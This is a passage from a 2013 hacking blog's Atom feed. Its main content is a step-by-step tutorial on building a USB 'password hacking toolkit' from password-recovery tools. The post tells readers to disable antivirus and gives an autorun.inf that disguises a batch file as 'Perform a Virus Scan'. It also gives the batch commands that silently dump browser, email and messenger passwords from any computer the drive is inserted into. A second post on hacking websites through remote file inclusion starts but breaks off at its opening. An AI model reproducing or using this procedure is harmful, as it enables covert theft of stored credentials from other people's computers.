Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003,&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD7&quot;&gt;AOL Instant Messenger&lt;/span&gt;&amp;nbsp;provided with Netscape 7, Trillian, Miranda, and GAIM.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://www.nirsoft.net/utils/mailpv.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #b50000; margin: 0px; outline: none; padding: 0px;&quot; target=&quot;_blank&quot;&gt;Mail PassView&lt;/a&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;Recovers
 the passwords of the following email programs: Outlook Express, 
Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, 
Netscape Mail, Mozilla Thunderbird, Group Mail Free.&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;Mail
 PassView can also recover the passwords of Web-based email accounts 
(HotMail, Yahoo!, Gmail), if you use the associated programs of these 
accounts.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://www.nirsoft.net/utils/internet_explorer_password.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #b50000; margin: 0px; outline: none; padding: 0px;&quot; target=&quot;_blank&quot;&gt;IE Passview&lt;/a&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;IE PassView is a small utility that reveals the passwords stored by&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD6&quot;&gt;Internet Explorer browser&lt;/span&gt;. It supports the new&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD1&quot;&gt;Internet Explorer 7&lt;/span&gt;.0, as well as older versions of Internet explorer, v4.0 – v6.0&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://www.nirsoft.net/utils/pspv.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #b50000; margin: 0px; outline: none; padding: 0px;&quot; target=&quot;_blank&quot;&gt;Protected Storage PassView&lt;/a&gt;:&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Recovers
 all passwords stored inside the Protected Storage, including the 
AutoComplete passwords of Internet Explorer, passwords of 
Password-protected sites, MSN Explorer Passwords, and more…&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;a href=&quot;http://www.nirsoft.net/utils/passwordfox.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #b50000; margin: 0px; outline: none; padding: 0px;&quot; target=&quot;_blank&quot;&gt;PasswordFox&lt;/a&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;:&amp;nbsp;&lt;/span&gt;&lt;/span&gt;PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by&amp;nbsp;&lt;span class=&quot;IL_AD&quot; id=&quot;IL_AD3&quot;&gt;Mozilla Firefox Web browser&lt;/span&gt;.
 By default, PasswordFox displays the passwords stored in your current 
profile, but you can easily select to watch the passwords of any other 
Firefox profile. For each password entry, the following information is 
displayed: Record Index, Web Site, User Name, Password, User Name Field,
 Password Field, and the Signons filename.&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;Here is a step by step procedre to create the password hacking toolkit.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;NOTE:&amp;nbsp;You must temporarily disable your&amp;nbsp;antivirus before following these steps.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;1.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Download&amp;nbsp;&lt;/span&gt;&lt;/span&gt;all the 5 tools, extract them and copy only the&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;executables(.exe files)&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;into your USB Pendrive.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;ie: Copy the files –&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;mspass.exe&lt;/span&gt;&lt;/span&gt;,&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;mailpv.exe&lt;/span&gt;&lt;/span&gt;,&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;iepv.exe&lt;/span&gt;&lt;/span&gt;,&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;pspv.exe&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;passwordfox.exe&lt;/span&gt;&lt;/span&gt;&amp;nbsp;into your USB Drive.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;2.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Create a new&amp;nbsp;Notepad&lt;/span&gt;&lt;/span&gt;&amp;nbsp;and write the following text into it&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;[autorun]&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;open=launch.bat&lt;br style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot; /&gt;ACTION= Perform a Virus&amp;nbsp;Scan&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;save&lt;/span&gt;&lt;/span&gt;&amp;nbsp;the&amp;nbsp;Notepad as all files and&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;rename it&lt;/span&gt;&lt;/span&gt;&amp;nbsp;from&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;New Text Document.txt&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;to&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;autorun.inf&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;Now&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;copy&amp;nbsp;&lt;/span&gt;&lt;/span&gt;the&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;autorun.inf&amp;nbsp;&lt;/span&gt;&lt;/span&gt;file onto your USB pendrive.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;3.&lt;/span&gt;&lt;/span&gt;&amp;nbsp;Create another Notepad and write the following text onto it.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;start mspass.exe /stext mspass.txt&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;start mailpv.exe /stext mailpv.txt&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;start iepv.exe /stext iepv.txt&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;start pspv.exe /stext pspv.txt&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;color: green; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;start passwordfox.exe /stext passwordfox.txt&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;save the Notepad and rename it from&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;New Text Document.txt&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;to&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;launch.bat&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Copy&amp;nbsp;&lt;/span&gt;&lt;/span&gt;the&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;launch.bat&lt;/span&gt;&lt;/span&gt;&amp;nbsp;file also to your USB drive.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;Now
 your rootkit is ready and you are all set to&amp;nbsp;sniff the passwords. You 
can use this pendrive on on&amp;nbsp;any computer to sniff the stored passwords. 
Just follow these steps&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;2. In the pop-up window, select the first option (&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;Perform a Virus Scan&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;).&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;3.
 Now all the password&amp;nbsp;recovery tools will silently get executed in the 
background (This process takes hardly a few seconds). The passwords get 
stored in the&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;&amp;nbsp;.TXT&lt;/span&gt;&lt;/span&gt;&amp;nbsp;files.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;4. Remove the pendrive and you’ll see the&amp;nbsp;stored passwords&amp;nbsp;in the&amp;nbsp;&lt;span style=&quot;margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;&lt;span style=&quot;font-family: Georgia, &#39;Times New Roman&#39;, serif;&quot;&gt;.TXT&lt;/span&gt;&lt;/span&gt;&amp;nbsp;files.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;This hack works on Windows 2000, XP and Vista&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;margin-bottom: 15px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;&quot;&gt;
&lt;span style=&quot;font-size: xx-small;&quot;&gt;&lt;b&gt;NOTE: This procedure will only recover the stored passwords (if any) on the Computer.&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://hackerx-malik.blogspot.com/feeds/2585190250570812062/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-sniffhack-passwords-using-usb.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2585190250570812062'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1848613746302332574/posts/default/2585190250570812062'/><link rel='alternate' type='text/html' href='http://hackerx-malik.blogspot.com/2013/01/how-to-sniffhack-passwords-using-usb.html' title='How to Sniff/Hack Passwords Using USB Drive?'/><author><name>Jawad</name><uri>http://www.blogger.com/profile/01313717750806790827</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1oTW2HVadY-aSglB90TS8wKHYvbzu9IBe2YM-oy8uPt-Nn9L0LtUaThRJSjjvyaB58-OgZ655-LqwD8gA5s-O6MgSXr4Eiw63HnLbaaqfKJ_9W5aiYa-lRcxLG-1bVjNEF9GBjued54_7/s72-c/sandisk-cruzer-contour-16gb-usb-pen-drive.gif" height="72" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1848613746302332574.post-8747626439353608693</id><published>2013-01-05T05:53:00.003-08:00</published><updated>2013-07-28T01:15:19.871-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials"/><category scheme="http://www.blogger.com/atom/ns#" term="Hacks How-To Guides"/><category scheme="http://www.blogger.com/atom/ns#" term="Internet"/><category scheme="http://www.blogger.com/atom/ns#" term="Network Hacks"/><category scheme="http://www.blogger.com/atom/ns#" term="Remote File Inclusion"/><title type='text'>Hack a Website Using Remote File Inclusion</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: justify;&quot;&gt;
